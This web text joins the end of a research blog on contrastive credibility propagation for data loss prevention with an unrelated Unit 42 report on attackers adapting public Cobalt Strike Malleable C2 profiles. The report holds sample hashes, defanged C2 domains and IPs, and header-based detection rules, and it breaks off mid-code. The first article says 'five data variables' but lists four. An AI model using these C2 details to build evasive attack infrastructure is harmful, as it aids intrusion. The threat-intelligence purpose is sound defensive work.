This procedure is optional, but it does help speed up convergence and even converge at better solutions with generalizable settings. At the end of an iteration, we compute a percentage of the weakest pseudo-labels to reset back to their initialization (the zero vector). This allows the network to train on a cleaner pseudo-label set for the next iteration. Reset pseudo-labels will be assigned a new pseudo-label in the next iteration.

What percent of the weakest pseudo-labels should we reset? Resetting too many pseudo-labels can lead to instability in training (i.e., the accuracy of pseudo-labels dropping rapidly or failing to converge across iterations).

We hypothesize that the cause of this instability is similar to the cause of instability observed with self-training techniques. Self-training is the concept of iteratively assigning unlabeled data pseudo-labels and moving them (usually the strongest ones) into the train set. Many state-of-the-art SSL algorithms can be categorized as a form of self-training.

Here, we are resetting existing pseudo-labels that would otherwise be kept. So, in a sense, it’s the inverse of self-training.

A unique strength of CCP is that it is highly stable without subsampling (a theoretical explanation for this is provided in the paper). This gives us a way to balance stability with the desire to reset incorrect pseudo-labels. We consider a wide range of candidate subsampling percentages of the weakest pseudo-labels to reset.

We first compute a probability distribution over classes that summarizes the state of all pseudo-labels in totality (sum them together then divide by the total mass). This serves as our anchor distribution – it's what we want to limit the divergence from.

For each candidate subsampling percentage, we compute a summarizing probability distribution over the pseudo-labels again after resetting the weakest corresponding percent of pseudo-labels. We then have a new summarizing probability distribution for each candidate subsampling percentage.

We compute the Kullback-Leibler divergence (the difference in information between probability distributions) of each candidate distribution from the anchor distribution. These divergence measures represent how much the summarizing probability distribution changes when increasing the candidate subsampling percentage.

To finish subsampling, we simply choose the highest candidate subsampling percentage that obeys a strict limit on the divergence and then apply that to our pseudo-labels. We slowly decrease the strict cap on divergence through CCP iterations to support convergence.
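The subsampling steps above can be sketched in a few lines of NumPy. This is a minimal illustration rather than the paper's implementation: the function names, the candidate list and the divergence cap are hypothetical, the direction of the KL divergence (candidate relative to anchor) is an assumption, and credibility pseudo-labels are assumed to be non-negative vectors.

```python
import numpy as np

def summarize(labels):
    """Sum pseudo-labels over samples, then divide by the total mass."""
    mass = labels.sum(axis=0)
    total = mass.sum()
    if total <= 0:  # every pseudo-label is the zero vector
        return np.full(labels.shape[1], 1.0 / labels.shape[1])
    return mass / total

def kl_divergence(p, q, eps=1e-12):
    """KL(p || q) with clipping to avoid log(0)."""
    p = np.clip(p, eps, None)
    q = np.clip(q, eps, None)
    return float(np.sum(p * np.log(p / q)))

def reset_weakest(labels, fraction):
    """Return a copy with the weakest `fraction` of pseudo-labels zeroed."""
    strength = labels.max(axis=1)      # strength = maximum entry
    order = np.argsort(strength)       # weakest first
    k = int(round(fraction * len(labels)))
    trial = labels.copy()
    trial[order[:k]] = 0.0             # reset to the initialization
    return trial

def choose_reset_fraction(labels, candidates, max_divergence):
    """Pick the largest candidate whose divergence from the anchor is allowed."""
    anchor = summarize(labels)
    best = 0.0
    for fraction in sorted(candidates):
        candidate = summarize(reset_weakest(labels, fraction))
        if kl_divergence(candidate, anchor) <= max_divergence:
            best = max(best, fraction)
    return best

if __name__ == "__main__":
    # Toy pseudo-labels: 4 samples, 2 classes (hypothetical values).
    labels = np.array([[0.9, 0.0], [0.8, 0.0], [0.0, 0.7], [0.05, 0.0]])
    fraction = choose_reset_fraction(labels, [0.0, 0.25, 0.5], max_divergence=0.01)
    print(fraction, reset_weakest(labels, fraction))
```

In this toy case, resetting half of the pseudo-labels would wipe out the only sample of the second class, so the summarizing distribution shifts sharply and that candidate is rejected under a tight cap.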

Importantly, this method imposes no assumptions and is normalized to the dataset size. Accordingly, a single subsampling schedule generalizes well across all of our experiments.

Examples of an ablation study on subsampling are shown in Figure 8. Specifically, we see the state of pseudo-labels converge faster and the overall accuracy of pseudo-labels increase upon convergence.

Image 8 is a comparison of two graphs. The top graph is the percentage of the pseudo label accuracy compared to the iteration, where the dotted lines represent subsampling turned off. Blue line: Base case. Red line: 25 labels. Yellow line: 4 labels. Pink line: 2 labels. The bottom graph is the percentage of the pseudo label accuracy. Blue line: Base case. Red line: 25 labels. Yellow line: 4 labels. Pink line: 2 labels.
Figure 8. Representative examples of the effect of subsampling on pseudo-label accuracy and convergence through CCP iterations. Dotted (solid) lines correspond to subsampling turned off (on). Source: Palo Alto Networks, AI Research.

Experimental Results

Our paper has a comprehensive overview of all our experimental results. We enumerate five different kinds of data quality issues (data variables) and then measure the sensitivity of five state-of-the-art SSL algorithms to these data variables.

Sensitivity refers to how large an impact a data variable has on the results of an SSL algorithm. The five data variables in question are:

  • Few-shot: Changing the scarcity of labeled data.
  • Open-set: Changing the percentage of unlabeled data that belongs to no class.
  • Noisy-label: Changing the percentage of given labels that are incorrect.
  • Class imbalance/misalignment: Changing the class frequency distributions in the labeled and unlabeled sets separately (while the other remains balanced).

Each algorithm tested was optimized for a single, specific data variable. However, as we argue here, a practitioner rarely knows in advance what data variables they need to overcome. There is thus a gap in the practical usefulness of narrowly optimized methods.

We explore each data variable at three levels of severity. We construct our data variable scenarios by applying corruptions to two standard benchmark computer vision datasets (CIFAR-10 and CIFAR-100). In addition to our SSL algorithms, we train a supervised baseline in every scenario.

In brief, CCP is not the optimal solution for every scenario, but it demonstrates remarkable consistency. For example, it is the only algorithm outperforming the supervised baseline in every scenario.

We discovered one or more scenarios that result in catastrophic performance degradation for every other algorithm. This is shown in Table 1, which distills the minimum accuracy of each algorithm on our two datasets across all scenarios.

| Algorithm | CIFAR-10 | CIFAR-100 |
|---|---|---|
| CCP (Ours) | 90.23% | 61.38% |
| CoMatch | 50.05% | 47.94% |
| ACR | 39.75% | 22.07% |
| OpenMatch | 43.08% | 27.88% |
| FixMatch w/o DA | 44.62% | 41.84% |
| FixMatch w/ DA | 46.97% | 40.95% |

Table 1. Minimum accuracies for each algorithm across all scenarios for both datasets.

CCP Applied to DLP

DLP is a critical cybersecurity task aimed at monitoring sensitive data within an organization and preventing its exfiltration. ML-powered DLP services feature models that must autonomously classify if a given document is sensitive or not sensitive. Often, models must also determine what kind of sensitive data lies within the document (e.g., financial, health, legal or source code).

For this demo, we apply CCP to a similar deep learning DLP classifier. To simplify, we assume the input document contains only text. However, CCP applies to any model tasked with ingesting documents of any modality. The demo document classifier recognizes multiple sensitive document classes and one non-sensitive class.

A practitioner faced with building such a classifier must overcome some fundamental challenges. By definition, the data you’d like to classify in deployment is unviewable due to privacy concerns.

Labeled datasets to train, test and validate a classifier must be gathered with publicly available versions of sensitive documents or custom synthetic samples. Both of those efforts are useful, but, in any non-trivial deployment scenario, there will inevitably be a large information gap between labeled data and production data.

The class frequency and content frequency distributions may vary widely. Also, new types of content for a given class may be present in production data but not in your labeled dataset. Naturally, the desire to train on real production data arises.

The rough sketch of applying CCP to a DLP classifier is as follows:

  1. We define a means to extract privatized versions of unlabeled sensitive production data
  2. We attach the lightweight architectural components necessary to compute CCP’s algorithms and losses to the existing classifier
  3. We repeat CCP iterations to iteratively refine a set of pseudo-labels for all the unlabeled data
  4. We use a combination of given labels and the final state of pseudo-labels to train a final inductive classifier

Working with Sensitive Data While Preserving Privacy

Many solutions have been proposed to train with private data. Popular solutions include federated learning, homomorphic encryption and differential privacy (DP).

A comparative discussion of these techniques is out-of-scope for this blog. We instead detail how one can use a combination of DP and CCP to train on production data in a privacy-preserving yet effective manner.

To understand DP, consider the following. Imagine you’re in a classroom and you have a secret – your favorite food is broccoli, but you don't want anyone to know. Now, suppose your teacher is taking a survey of everyone's favorite food in class. You don't want to lie, but you also don't want anyone to know your secret. This is where DP comes in.

Instead of telling your true favorite food, you decide to flip a coin. If it's heads, you tell the truth. If it's tails, you pick a food at random.

Now, even if your teacher says “someone in class likes broccoli,” no one will know for sure it's you, because it could have been a random choice. DP works similarly. It adds a bit of random "noise" to the data. The noise is enough to keep individual information private, but not so much that the overall trends in the data can't be seen.

Your teacher can still get a general idea of the class's favorite foods, even if they don’t know that you secretly love broccoli. The key aspect here is that by introducing the coin flip (or randomness), you're adding an element of plausible deniability.

Even if someone guessed that you chose broccoli, the coin flip introduces doubt, protecting your privacy. In the context of DLP document classification, we use DP to preserve the privacy of production documents while mostly preserving the general statistics of a large collection of documents.
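The coin-flip survey above is a form of what is usually called randomized response. The following sketch simulates it and shows how the teacher can still recover class-wide trends. The food list, class size and function names are hypothetical, chosen only for illustration.

```python
import random

def randomized_response(true_answer, options, rng):
    """Heads: report the truth. Tails: report a uniformly random option."""
    if rng.random() < 0.5:
        return true_answer
    return rng.choice(options)

def estimate_share(reports, option, num_options):
    """Undo the known noise to estimate the true share of `option`.

    Expected observed share = 0.5 * true_share + 0.5 / num_options.
    """
    observed = sum(1 for r in reports if r == option) / len(reports)
    return 2.0 * (observed - 0.5 / num_options)

if __name__ == "__main__":
    rng = random.Random(42)
    options = ["broccoli", "pizza", "pasta", "apples"]
    # Hypothetical class: 30% truly prefer broccoli.
    truths = ["broccoli"] * 300 + ["pizza"] * 700
    reports = [randomized_response(t, options, rng) for t in truths]
    print("estimated broccoli share:", estimate_share(reports, "broccoli", len(options)))
```

No single report reveals a student's true answer, yet the aggregate estimate approaches the true share as the number of reports grows.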

We need a real-valued representation of the document to apply DP noise to and achieve its theoretical privacy guarantees. A special feature extraction model is typically used for this purpose. Its job is to non-reversibly convert a text document into a large collection of floating point numbers.

This representation is unreadable by a human but preserves the high-level semantics of the document (an additional layer of privacy). Industry-standard levels of DP noise are added to this floating point representation to ensure the representation can be safely extracted from production data.
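As a rough illustration of adding DP noise to a floating point representation, the sketch below clips a feature vector and adds Gaussian noise. The article does not say which DP mechanism or parameters are used, so everything here is an assumption: the Gaussian mechanism with its classic calibration (stated for epsilon below 1), the clipping norm, and the epsilon and delta values are placeholders rather than the production settings.

```python
import math
import numpy as np

def clip_l2(vec, clip_norm):
    """Scale the vector down so its L2 norm is at most clip_norm."""
    vec = np.asarray(vec, dtype=float)
    norm = np.linalg.norm(vec)
    if norm <= clip_norm:
        return vec
    return vec * (clip_norm / norm)

def gaussian_sigma(sensitivity, epsilon, delta):
    """Classic Gaussian-mechanism noise scale (assumes 0 < epsilon < 1)."""
    return math.sqrt(2.0 * math.log(1.25 / delta)) * sensitivity / epsilon

def privatize(vec, clip_norm, epsilon, delta, rng):
    """Clip the representation, then add calibrated Gaussian noise."""
    clipped = clip_l2(vec, clip_norm)
    # Swapping one document for another moves the clipped vector by at most 2 * clip_norm.
    sigma = gaussian_sigma(2.0 * clip_norm, epsilon, delta)
    return clipped + rng.normal(0.0, sigma, size=clipped.shape)

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    features = rng.normal(size=8)  # stand-in for a feature extractor's output
    print(privatize(features, clip_norm=1.0, epsilon=0.5, delta=1e-5, rng=rng))
```

Clipping bounds how much any single document can influence the output, which is what lets the noise scale be calibrated independently of the document's content.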

Despite having privatized representations of sensitive documents, you must still overcome the fact that the representations are unlabeled. This is where CCP comes into play.

Neural Architecture Details

Our deep learning model takes in privatized representations of documents as input. Its task is to output the correct classification verdict for each input sample.

CCP also requires us to define a separate embedding space within which we will learn a similarity function that compares inputs. The similarity function will be trained to assign inputs of the same class with higher similarity than inputs of different classes.

This similarity function is trained with a contrastive loss allowing us to produce pseudo-labels transductively. The core architecture components of CCP are illustrated in Figure 9.

Image 9 is the equation of the architecture of the core components of the contrastive credibility propagation.
Figure 9. High-level illustration of the core architecture components of CCP.

The notation in Figure 9 is as follows:

  • \(x\) – An input sample
  • \(\mathcal{T}\) – The set of transformations
  • \(t\) – A randomly sampled transformation
  • \(f_b\) – The encoder network
  • \(f_z\) – The contrastive projection head
  • \(f_g\) – The classification projection head
  • \(\mathcal{L}_{\text{SSC}}\) – Softly supervised contrastive loss
  • \(\mathcal{L}_{\text{CLS}}\) – Standard cross-entropy classification loss

Firstly, in line with other work on contrastive learning, we define a set of transformations, \(\mathcal{T}\), over our data. The job of transformations is to corrupt the low-level details of an input while preserving its high-level class semantics.

For images, this could be random crops or color jitter. For text, this could be noise added to the embedding vectors or randomly hiding words.

Randomly drawing two transformations leads to two views of each input sample with the same class label. These transformations help the learned similarity metric and the classifier robustly overcome low-level noise.
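A minimal sketch of drawing two views for a text sample follows. The mask token, masking rates and helper names are hypothetical. The transformations here randomly hide words, one of the options mentioned above.

```python
import random

MASK = "[MASK]"  # hypothetical placeholder for a hidden word

def hide_words(tokens, rng, rate):
    """Replace each token with MASK independently with probability `rate`."""
    return [MASK if rng.random() < rate else tok for tok in tokens]

# A small set of transformations T: the same operation at different strengths.
TRANSFORMS = [
    lambda tokens, rng: hide_words(tokens, rng, 0.1),
    lambda tokens, rng: hide_words(tokens, rng, 0.3),
]

def two_views(tokens, transforms, rng):
    """Draw two random transformations and apply each to the same sample."""
    t1 = rng.choice(transforms)
    t2 = rng.choice(transforms)
    return t1(tokens, rng), t2(tokens, rng)

if __name__ == "__main__":
    rng = random.Random(0)
    doc = "quarterly revenue figures for the finance team".split()
    view_a, view_b = two_views(doc, TRANSFORMS, rng)
    print(view_a)
    print(view_b)
```

Both views inherit the class label (or pseudo-label) of the original sample, which is what makes them a positive pair for the contrastive loss.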

An encoder network, \(f_b\), processes the transformed batch of data. The encoder’s job is to transform the input into a new encoded vector space.

The exact structure of \(f_b\) (a CNN, transformer, RNN, etc.) depends only on what makes sense for your data type. A transformer would be a common choice for DLP and natural language documents.

Two projection heads (\(f_z\) and \(f_g\)) bring the encoder outputs into two new vector spaces upon which we compute our loss functions. Each projection head is a multilayer perceptron (i.e., a short sequence of fully connected layers).

Concerning an existing deep learning DLP classifier, \(f_g\) would be the last layer of your classifier (upon which you compute softmax and your classification loss) while \(f_b\) would be everything prior. The \(f_z\) projection head, used to learn a similarity metric, would be the only new neural network component to add.
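The wiring of \(f_b\), \(f_z\) and \(f_g\) can be sketched with NumPy as follows. This is only a structural illustration under stated assumptions: a small MLP stands in for the encoder (a transformer would be more typical for documents), all dimensions are hypothetical, and the weights are random and untrained.

```python
import numpy as np

rng = np.random.default_rng(0)

def init_mlp(sizes):
    """Random weights for a stack of fully connected layers."""
    return [(rng.normal(0.0, 0.1, (m, n)), np.zeros(n))
            for m, n in zip(sizes[:-1], sizes[1:])]

def mlp(x, layers):
    """Apply the layers with ReLU between them (none after the last)."""
    for i, (w, b) in enumerate(layers):
        x = x @ w + b
        if i < len(layers) - 1:
            x = np.maximum(x, 0.0)
    return x

# Hypothetical dimensions.
INPUT_DIM, HIDDEN_DIM, EMBED_DIM, NUM_CLASSES = 32, 64, 16, 5

f_b = init_mlp([INPUT_DIM, HIDDEN_DIM, HIDDEN_DIM])   # encoder (stand-in)
f_z = init_mlp([HIDDEN_DIM, HIDDEN_DIM, EMBED_DIM])   # contrastive projection head
f_g = init_mlp([HIDDEN_DIM, NUM_CLASSES])             # classification head (last layer)

def forward(x, training=True):
    """Return (z, logits); z is None at inference, where f_z is discarded."""
    h = np.maximum(mlp(x, f_b), 0.0)
    logits = mlp(h, f_g)
    if not training:
        return None, logits
    z = mlp(h, f_z)
    z = z / (np.linalg.norm(z, axis=1, keepdims=True) + 1e-12)  # unit-length embeddings
    return z, logits

if __name__ == "__main__":
    batch = rng.normal(size=(8, INPUT_DIM))  # stand-in for privatized representations
    z, logits = forward(batch)
    print(z.shape, logits.shape)
```

The contrastive loss would be computed on `z` and the classification loss on `logits`, so adding CCP to an existing classifier only requires the extra `f_z` branch.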

Learning and Applying a Similarity Metric

The algorithms and losses unique to CCP are computed within the vector space defined by \(f_z\). We define a novel, softly supervised contrastive loss to learn the similarity metric.

Two popular contrastive loss functions are SimCLR and SupCon, which can be interpreted as unsupervised and supervised versions of the same loss. Both loss functions assume that positive and negative pairs (pairs that should be similar and dissimilar, respectively) are sampled discretely. This is not the case when we have soft pseudo-labels. Instead, we only have a variable confidence in each positive-pair relationship, defined by the magnitude of the pseudo-label vector.

We describe a generalization of SimCLR and SupCon designed to work with this uncertainty, denoted \(\mathcal{L}_{\text{SSC}}\). Our study shows that SimCLR and SupCon losses are special cases of \(\mathcal{L}_{\text{SSC}}\).
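To make the idea of soft positive pairs concrete, here is one possible soft-weighted contrastive loss in NumPy. It is not the paper's \(\mathcal{L}_{\text{SSC}}\): the pair weighting (the dot product of two pseudo-label vectors, with the two views of one sample always weighted 1) is an assumption chosen so that zero-vector labels give a SimCLR-style loss and one-hot labels give a SupCon-style loss.

```python
import numpy as np

def soft_contrastive_loss(z, q, view_of, temperature=0.1):
    """Soft-weighted contrastive loss (illustrative, not the paper's formula).

    z:       (n, d) L2-normalized embeddings, two views per sample
    q:       (n, c) non-negative pseudo-label vectors (zero vector = unknown)
    view_of: view_of[i] is the row index of the other view of sample i
    """
    z = np.asarray(z, dtype=float)
    q = np.asarray(q, dtype=float)
    n = z.shape[0]
    idx = np.arange(n)

    # Pairwise similarities; a sample is never compared with itself.
    sim = (z @ z.T) / temperature
    sim[idx, idx] = -np.inf
    row_max = sim.max(axis=1, keepdims=True)
    log_norm = row_max + np.log(np.exp(sim - row_max).sum(axis=1, keepdims=True))
    log_prob = sim - log_norm
    log_prob[idx, idx] = 0.0  # excluded below by a zero weight

    # Soft positive-pair weights: confidence that i and j share a class.
    w = q @ q.T
    w[idx, view_of] = 1.0     # two views of one sample are always positives
    w[idx, idx] = 0.0

    per_anchor = -(w * log_prob).sum(axis=1) / w.sum(axis=1)
    return float(per_anchor.mean())

if __name__ == "__main__":
    z = np.array([[1.0, 0.0], [1.0, 0.0], [0.0, 1.0], [0.0, 1.0]])
    q = np.zeros((4, 2))  # no label information: SimCLR-like behavior
    print(soft_contrastive_loss(z, q, view_of=[1, 0, 3, 2]))
```

Weak pseudo-labels produce small pair weights, so uncertain samples contribute little to the loss beyond their own pair of views.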

Following the formalization of the algorithm visualized in Figure 5, we repeat the cycle of propagating pseudo-labels with this learned similarity metric followed by averaging pseudo-labels across epochs. We apply subsampling as defined above as necessary.

Once the process has converged, we use the final state of pseudo-labels to train a new inductive classifier consisting of \(f_b\) and \(f_g\). In practice, retaining \(f_z\) to compute \(\mathcal{L}_{\text{SSC}}\) during classifier training as an additional loss provides a classification performance boost. However, during inference, \(f_z\) is discarded.

Impact

We outline above the steps to train a DLP classifier on a combination of a curated labeled dataset and unlabeled, privatized production data with CCP. By doing so, you’ve made an important step toward aligning your machine learning model with your target production data distribution.

Despite achieving similarly high test set classification performance in internal experiments, DLP classifiers adjusted with CCP saw a 250% increase in successful detections of sensitive documents in a real-world test. This underscores the critical importance of ensuring the alignment of your ML models to the actual deployment data distributions. Traditional performance metrics on a test split of your curated dataset can sometimes be very misleading!

CCP provides a useful tool for practitioners to confidently align models when the deployment data distribution is unlabeled or even unviewable. DLP is just one experimental setting. CCP is general enough to provide value for any classifiers built on any partially labeled dataset.

Conclusion

We have reviewed the CCP algorithm, its core components and some benchmark analyses presented in depth at AAAI '24. We have discussed its specific, unique benefits compared to other semi-supervised learning algorithms.

We’ve walked through an example of applying CCP to DLP, a critical component of any enterprise cybersecurity solution. We’ve discussed why DLP is well suited to demonstrate CCP’s unique strengths.

Palo Alto Networks continues to improve state-of-the-art DLP. Enterprise DLP customers are better protected against sensitive data loss through CCP.

Updated June 28, 2024, at 9:55 a.m. PT to correct the text. 

Attackers Exploiting Public Cobalt Strike Profiles

Executive Summary

In this article, Unit 42 researchers detail recent findings of malicious Cobalt Strike infrastructure. We also share examples of malicious Cobalt Strike samples that use Malleable C2 configuration profiles derived from the same profile hosted on a public code repository.

Cobalt Strike is a commercial software framework that enables security professionals like red team members to simulate attackers embedding themselves in a network environment. However, threat actors continue to use cracked versions of Cobalt Strike in real-world attacks. The post-exploitation payload called Beacon uses text-based profiles called Malleable C2 to change the characteristics of Beacon's web traffic in an attempt to avoid detection.

Despite its use in defensive cybersecurity assessments, threat actors continue to leverage Cobalt Strike for malicious purposes. Due to its malleable and evasive nature, Cobalt Strike remains a significant security threat to organizations.

Palo Alto Networks customers are better protected from Cobalt Strike Beacon and Team Server C2 communication in the following ways:

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Cobalt Strike, Malleable C2 Profile

From Server to Beacon to Profile

Unit 42 has multiple techniques to find Cobalt Strike servers hosted on the internet, some of which we have documented in a previous article about Cobalt Strike analysis. The traffic flow and detection in this article were triggered by our Advanced Threat Prevention (ATP) solution.

After finding these Cobalt Strike servers, we pivoted on this information to discover any associated Beacon files. Our investigation of these samples revealed Malleable C2 profiles, which are described in another previous article about Malleable C2 profiles.

Our research also revealed that these Malleable C2 profiles borrow heavily from a single example hosted on a publicly available software repository.

First Sample

This first Beacon sample borrows from a Malleable C2 profile named ocsp.profile hosted on a publicly available software repository. This profile itself is not malicious, and it is one of many hosted on publicly available repositories that attackers can copy and alter for their own malicious purposes.

First sample SHA256 hash:

  • 1980becd2152f4c29dffbb9dc113524a78f8246d3ba57384caf1738142bb3a07

We downloaded this Beacon sample from one of the Cobalt Strike servers discovered by our ATP solution. Attackers typically retrieve Beacon instances from Cobalt Strike servers and load Beacon into memory through some other compromised process. Embedded in this Beacon binary are details from its Malleable C2 profile.

We used Didier Stevens’ Python script 1768.py to extract the Malleable C2 profile details. These details are listed below in Table 1.

| Profile Component | Description | Details |
|---|---|---|
| GET | Request to get the command to execute | Method: GET; Cobalt Strike C2 domains: msupdate.azurefd[.]net, o365updater.azureedge[.]net, gupdater.bbtecno[.]com, teamsupd.azurewebsites[.]net, msdn1357.centralus.cloudapp.azure[.]com, cupdater.bbtecno[.]com; URI: /ocsp/; Header: User-Agent: Microsoft-CryptoAPI/7.0 |
| POST | Request to return the command execution result | Method: POST; URI: /ocsp/a/ |

Table 1. Extracted network information from the profile of our first Beacon sample.

Below, Figure 1 shows part of the results from Stevens' Python script analysis of our first Beacon sample. This section contains information related to the sample's Malleable C2 profile configuration. As noted in the http_get_header section, metadata of the victim is encoded using lowercase NetBIOS encoding and appended to the request URI. This configuration also adds Accept: */* to the HTTP GET request header.

Image 1 is a screenshot of Python script. Red arrows point to the header section.
Figure 1. Output from running Stevens’ 1768.py script on our first Beacon sample.

Figure 2 shows a TCP stream of the HTTP C2 traffic between this Beacon instance and the Cobalt Strike server. In it, we can see the lowercase NetBIOS encoding in the GET request as specified by the Malleable C2 profile.

Image 2 is a screenshot of a Wireshark TCP stream for the command and control traffic. It includes the GET, Host (which is redacted) connection, and user agent information.
Figure 2. TCP stream of HTTP C2 traffic generated by our first Cobalt Strike Beacon sample.
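For readers unfamiliar with the lowercase NetBIOS encoding seen in the request URI, the sketch below shows the scheme as it is commonly described for Malleable C2's netbios transform: each byte is split into two 4-bit halves, and each half is added to the letter 'a'. The function names and the sample input are hypothetical, and the real metadata blob is encrypted before it is encoded.

```python
def netbios_encode(data: bytes, base: str = "a") -> str:
    """Encode each byte as two letters: high nibble, then low nibble."""
    start = ord(base)
    out = []
    for byte in data:
        out.append(chr(start + (byte >> 4)))
        out.append(chr(start + (byte & 0x0F)))
    return "".join(out)

def netbios_decode(text: str, base: str = "a") -> bytes:
    """Reverse netbios_encode; rejects malformed input."""
    if len(text) % 2 != 0:
        raise ValueError("encoded text must have an even length")
    start = ord(base)
    decoded = bytearray()
    for i in range(0, len(text), 2):
        high = ord(text[i]) - start
        low = ord(text[i + 1]) - start
        if not (0 <= high <= 15 and 0 <= low <= 15):
            raise ValueError("character outside the encoding alphabet")
        decoded.append((high << 4) | low)
    return bytes(decoded)

if __name__ == "__main__":
    blob = bytes([0x00, 0x41, 0xFF])  # stand-in bytes, not real Beacon metadata
    encoded = netbios_encode(blob)
    print(encoded, netbios_decode(encoded) == blob)
```

Because every byte becomes two letters from a 16-letter alphabet, the encoded metadata appears in traffic as a long run of lowercase letters between 'a' and 'p'.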

This profile configuration appears to be based on the ocsp.profile from a publicly accessible software repository. The attackers merely replaced /oscp/ with /ocsp/ for both HTTP request methods and changed the User-Agent string from Microsoft-CryptoAPI/6.1 to Microsoft-CryptoAPI/7.0. Figure 3 indicates values from the original Malleable C2 profile that were altered for this Beacon sample. The rest of the profile used for this sample matches the original ocsp.profile content.

Image 3 is a screenshot of the GitHub page for user rsmudge’s Malleable C2 profile.
Figure 3. The original ocsp.profile, indicating the values updated in our first Beacon sample.

Second Sample

The Malleable C2 profile of our second Beacon sample borrows from the same ocsp.profile as our first sample.

Second sample SHA256 hash:

  • b587e215ce8c0b3a1525f136fe38bfdc0232300e1a4f7e651e5dc6e86313e941

Like our first example, this Beacon sample is a staged binary hosted by a Cobalt Strike server that our ATP platform detected and downloaded. Following the same analysis procedure, we extracted the Malleable C2 profile information using 1768.py and compared the results with our repository of known profiles. Table 2 shows the network information we extracted from this profile.

| Profile Component | Description | Details |
|---|---|---|
| C2: GET | Request to get the command to execute | Method: GET; Cobalt Strike C2 domains: msupdate.brazilsouth.cloudapp.azure[.]com, msdn1357.centralus.cloudapp.azure[.]com, update37.eastus.cloudapp.azure[.]com, update.westus.cloudapp.azure[.]com, 146.235.52[.]69, 159.112.177[.]137; URI: /download/; Header: User-Agent: Microsoft-CryptoAPI/8.1 |
| C2: POST | Request to return the command execution result | Method: POST; URI: /pkg/a/ |

Table 2. Extracted network information from the profile of our second Beacon sample.

In this Beacon sample, the attackers changed the URI of the HTTP GET request from the original ocsp.profile value of /oscp/ to /download/. They also changed the URI of the HTTP POST request from /oscp/a/ to /pkg/a/. Finally, they updated the User-Agent value from Microsoft-CryptoAPI/6.1 to Microsoft-CryptoAPI/8.1.
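The comparison against the public profile can be expressed as a simple field-by-field diff. The sketch below uses only the values reported in this article. The dictionary keys and function name are hypothetical and do not reflect the output format of 1768.py.

```python
# Values of the public ocsp.profile, as described in this article.
PUBLIC_PROFILE = {
    "get_uri": "/oscp/",
    "post_uri": "/oscp/a/",
    "user_agent": "Microsoft-CryptoAPI/6.1",
}

# Values extracted from the first and second Beacon samples.
SAMPLES = {
    "first": {
        "get_uri": "/ocsp/",
        "post_uri": "/ocsp/a/",
        "user_agent": "Microsoft-CryptoAPI/7.0",
    },
    "second": {
        "get_uri": "/download/",
        "post_uri": "/pkg/a/",
        "user_agent": "Microsoft-CryptoAPI/8.1",
    },
}

def diff_profile(base, sample):
    """Return {field: (base_value, sample_value)} for every changed field."""
    return {
        key: (value, sample.get(key))
        for key, value in base.items()
        if sample.get(key) != value
    }

if __name__ == "__main__":
    for name, profile in SAMPLES.items():
        print(name, diff_profile(PUBLIC_PROFILE, profile))
```

A small diff like this against a library of known public profiles makes it easy to see which profile a sample was derived from and which fields the operator bothered to change.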

Figure 4 shows a TCP stream of the HTTP C2 traffic between this second Beacon instance and its Cobalt Strike server.

Image 4 is a screenshot of a Wireshark TCP stream. The host has been redacted. The information includes the GET, Host (which is redacted) connection, and user agent.
Figure 4. TCP stream of HTTP C2 traffic generated by our second Cobalt Strike Beacon sample.

Third Sample

The Malleable C2 profile of our third sample borrows from the same ocsp.profile as our first and second samples.

Third sample SHA256 hash:

  • 38eeb82dbb5285ff6a2122a065cd1f820438b88a02057f4e31a1e1e5339feb2b

This third Cobalt Strike sample is a stageless 64-bit Windows executable file that uses the same ocsp.profile for its Malleable C2 profile, but with a twist. The domain for its C2 server contains a string in the leading subdomain that matches the FQDN of a well-known multinational technology company.

The FQDN for this Cobalt Strike C2 server is www.consumershop.lenovo.com.cn.d4e97cc6.cdnhwcggk22[.]com. However, the parent domain is actually cdnhwcggk22[.]com.
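A quick way to avoid being misled by a brand name in the leading labels is to split the hostname from the right. The sketch below is deliberately naive: it assumes a single-label public suffix such as .com, whereas a production tool should consult the Public Suffix List. The function names are hypothetical.

```python
def refang(indicator: str) -> str:
    """Turn a defanged indicator such as example[.]com back into a hostname."""
    return indicator.replace("[.]", ".")

def split_domain(fqdn: str, suffix_labels: int = 1):
    """Split a hostname into (subdomain part, registered domain).

    suffix_labels is the number of labels in the public suffix
    (1 for .com). This is an assumption supplied by the caller.
    """
    labels = refang(fqdn).lower().rstrip(".").split(".")
    keep = suffix_labels + 1
    return ".".join(labels[:-keep]), ".".join(labels[-keep:])

if __name__ == "__main__":
    fqdn = "www.consumershop.lenovo.com.cn.d4e97cc6.cdnhwcggk22[.]com"
    subdomain, registered = split_domain(fqdn)
    print("registered domain:", registered)
    print("attacker-controlled prefix:", subdomain)
```

Everything to the left of the registered domain is chosen freely by whoever controls that domain, so a familiar brand name there says nothing about ownership.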

Figure 5 shows an example of HTTP C2 traffic generated by this third sample, starting after a DNS query of the C2 domain resolves to the server's IP address.

Image 5 is a screenshot of infection traffic filtered in Wireshark.
Figure 5. Filtered in Wireshark, C2 traffic generated by our third Cobalt Strike sample.

Borrowing From Public Malleable C2 Profiles

Detections for Cobalt Strike activity that depend on patterns in HTTP request headers are of limited value, since any variation of these patterns can cause the detection to fail. Some workarounds, such as regular expression patterns, can temporarily alleviate this evasion. However, attackers can trivially modify the Malleable C2 profile, creating a detection arms race where attackers remain one step ahead of conventional network security solutions. In these cases, the cost is imposed more heavily on the defender than the attacker.
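The brittleness of header-pattern detection can be shown with the values from the samples above. The two rules below are hypothetical examples written for this illustration and are not taken from any product: one pins the exact strings of the public ocsp.profile, the other relaxes the User-Agent version with a regular expression.

```python
import re

# Rule 1: exact strings from the public ocsp.profile.
EXACT_URI_PREFIX = "/oscp/"
EXACT_USER_AGENT = "Microsoft-CryptoAPI/6.1"

# Rule 2: tolerate any version number in the User-Agent.
USER_AGENT_PATTERN = re.compile(r"^Microsoft-CryptoAPI/\d+\.\d+$")

def exact_rule(uri: str, user_agent: str) -> bool:
    return uri.startswith(EXACT_URI_PREFIX) and user_agent == EXACT_USER_AGENT

def regex_rule(uri: str, user_agent: str) -> bool:
    return USER_AGENT_PATTERN.match(user_agent) is not None

# (URI, User-Agent) pairs: the public profile, then the first two samples.
OBSERVED = {
    "public profile": ("/oscp/", "Microsoft-CryptoAPI/6.1"),
    "first sample": ("/ocsp/", "Microsoft-CryptoAPI/7.0"),
    "second sample": ("/download/", "Microsoft-CryptoAPI/8.1"),
}

if __name__ == "__main__":
    for name, (uri, user_agent) in OBSERVED.items():
        print(name, "exact:", exact_rule(uri, user_agent),
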